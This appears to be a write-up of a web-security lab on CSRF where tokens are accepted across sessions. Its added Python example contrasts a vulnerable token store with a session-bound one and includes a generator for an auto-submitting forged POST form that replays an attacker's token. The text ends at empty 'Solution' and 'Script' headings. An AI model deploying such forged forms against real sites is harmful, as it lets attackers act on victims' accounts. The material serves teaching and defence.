




4. CSRF where token is not tied to user session

This web application is vulnerable to CSRF. The API endpoint and its parameters are well known, and
state-changing actions can be performed with nothing more than the user's session cookie: the server
does not check where the request came from (no Origin/Referer validation). Because the browser
attaches the site's cookie automatically, a page controlled by the attacker can submit a POST request
on the user's behalf. The application does issue CSRF tokens, but they are not bound to the user's
session: any token the application has issued is accepted for any session. An attacker can therefore
obtain a valid token from their own session, embed it in the forged request, and perform actions on
behalf of the victim.
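The following is an added example, not the lab's or the application's own code, showing why a token
that is merely "valid" is not enough. It models two server-side validators, one that accepts any
issued token for any session (the flaw described above) and one that binds the token to the session,
and an attacker page that replays a token harvested from the attacker's own session. The endpoint
path, the form field names and the session identifiers are assumptions chosen for illustration.

```python
"""Added example (not the lab's code): CSRF token validation that is not bound
to the session, beside a session-bound check, plus the attacker's forged form.
Endpoint name, field names and session ids are assumptions."""
import hmac
import secrets
from html import escape


class GlobalTokenCsrf:
    """Vulnerable: any token the app ever issued is accepted for any session."""

    def __init__(self):
        self.issued = set()

    def issue(self, session_id):
        token = secrets.token_hex(16)
        self.issued.add(token)          # session_id is ignored: this is the flaw
        return token

    def validate(self, session_id, token):
        return token in self.issued     # no link between token and session


class SessionBoundCsrf:
    """Hardened: the token is stored per session and compared in constant time."""

    def __init__(self):
        self.by_session = {}

    def issue(self, session_id):
        token = secrets.token_hex(16)
        self.by_session[session_id] = token
        return token

    def validate(self, session_id, token):
        expected = self.by_session.get(session_id)
        return expected is not None and hmac.compare_digest(expected, token)


def forged_form_html(token, action="/api/change-email", fields=None):
    """HTML the attacker hosts: an auto-submitting POST carrying the attacker's
    token. The victim's browser adds the victim's session cookie on its own.
    The action path and the 'email' field are assumed, not taken from the lab."""
    fields = dict(fields or {"email": "attacker@example.com"})
    fields["csrf"] = token
    inputs = "".join(
        f'<input type="hidden" name="{escape(k)}" value="{escape(v)}">'
        for k, v in fields.items()
    )
    return (f'<form id="f" method="POST" action="{escape(action)}">{inputs}</form>'
            '<script>document.getElementById("f").submit()</script>')


def run_attack(csrf, victim_sid="sid-victim", attacker_sid="sid-attacker"):
    """Attacker logs in, harvests a token from their own session and replays it
    in a request that arrives with the victim's cookie. Returns True if the
    server accepted the forged request."""
    csrf.issue(victim_sid)                      # the victim holds their own token
    attacker_token = csrf.issue(attacker_sid)   # attacker harvests theirs
    page = forged_form_html(attacker_token)     # hosted on the attacker's site
    assert attacker_token in page
    # What the server sees: the victim's session cookie plus the attacker's token.
    return csrf.validate(victim_sid, attacker_token)


def legitimate_request(csrf, sid="sid-victim"):
    """A normal same-session request must still pass under both validators."""
    token = csrf.issue(sid)
    return csrf.validate(sid, token)


if __name__ == "__main__":
    print("global token store accepts forged request:", run_attack(GlobalTokenCsrf()))
    print("session-bound store accepts forged request:", run_attack(SessionBoundCsrf()))
```

Running the block shows the forged request succeeding against the global-token validator and
failing against the session-bound one, while a legitimate same-session request passes in both
cases. Binding the token to the session is what stops cross-session replay; rejecting requests
whose Origin or Referer does not match the site is a complementary check, not a substitute.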


Solution

Script